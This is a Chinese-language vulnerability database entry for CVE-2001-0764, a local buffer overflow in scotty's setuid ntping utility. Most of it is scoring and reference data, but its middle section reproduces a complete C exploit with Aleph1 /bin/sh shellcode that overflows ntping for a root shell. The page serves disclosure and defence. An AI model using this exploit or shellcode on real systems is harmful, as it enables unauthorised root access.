CVE-2001-0764
CVSS7.2
发布时间 :2001-10-18 00:00:00
修订时间 :2008-09-10 15:08:47
NMCOE    

[原文]Buffer overflow in ntping in scotty 2.1.0 allows local users to execute arbitrary code via a long hostname as a command line argument.


[CNNVD]scotty ntping缓冲区溢出漏洞(CNNVD-200110-097)

        scotty 2.1.0版本的ntping存在缓冲区溢出漏洞。本地用户可以借助作为命令行参数的超长主机名来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:juergen_schoenwaelder:scotty:2.1.10
cpe:/a:juergen_schoenwaelder:scotty:2.1.9
cpe:/a:juergen_schoenwaelder:scotty:2.1.8
cpe:/a:juergen_schoenwaelder:scotty:2.1.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0764
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0764
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200110-097
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6735.php
(VENDOR_ADVISORY)  XF  scotty-ntping-bo(6735)
http://www.securityfocus.com/bid/2911
(VENDOR_ADVISORY)  BID  2911
http://www.securityfocus.com/archive/1/192664
(VENDOR_ADVISORY)  BUGTRAQ  20010621 suid scotty (ntping) overflow (fwd)
http://www.novell.com/linux/security/advisories/2001_023_scotty_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:023
http://archives.neohapsis.com/archives/vuln-dev/2001-q2/0627.html
(UNKNOWN)  VULN-DEV  20010615 Re: suid scotty (ntping) overflow (fwd)
http://archives.neohapsis.com/archives/vuln-dev/2001-q2/0579.html
(UNKNOWN)  VULN-DEV  20010609 suid scotty / ntping overflow

- 漏洞信息

scotty ntping缓冲区溢出漏洞
高危 缓冲区溢出
2001-10-18 00:00:00 2005-05-02 00:00:00
本地  
        scotty 2.1.0版本的ntping存在缓冲区溢出漏洞。本地用户可以借助作为命令行参数的超长主机名来执行任意代码。

- 公告与补丁

        

- 漏洞信息 (20960)

Juergen Schoenwaelder scotty 2.1.x ntping Buffer Overflow Vulnerability (EDBID:20960)
unix local
2001-06-13 Verified
0 Larry W. Cashdollar
N/A [点击下载]
source: http://www.securityfocus.com/bid/2911/info

ntping is a component of scotty, a Tcl interpreter used to retrieve status and configuration information for TCP/IP networks. The utility, which runs with root privileges, contains a locally exploitable buffer overflow vulnerability. A local attacker can supply a long string as a command line argument to ntping, which, if the argument is of sufficient length (approximately 9000 characters) will induce a segfault.

If the input is carefully constructed, a local attacker can exploit this vulnerability to execute arbitrary code on the target host. 

/*Larry W. Cashdollar                6/13/2001
  http://vapid.dhs.org               Vapid Labs
  Overflows ntping for scotty-2.1.9 based on post by
  dotslash@snosoft.com*/

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90		/*no operation skip to next instruction. */
#define LEN 590			/*our buffersize. */

/*lacks a call to setuid(0)*/
char shellcode[]= /*Aleph1's shell code. */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;

  long retaddr = get_sp ();

/*Fill the buffer with our new address to jump to esp + offset */
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + atoi (argv[1]);

/*copy the NOPs  in to the buffer leaving space for shellcode and
pointers*/

  printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN);
/*
  for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
    *(buffer + i) = NOP;*/

/*copy the shell code into the buffer*/
  memcpy (buffer + i, shellcode, strlen (shellcode));

  execl ("/usr/sbin/ntping", "ntping", buffer,0, 0);

}


		

- 漏洞信息

1879
scotty ntping Hostname Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-06-21 Unknow
2001-06-21 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站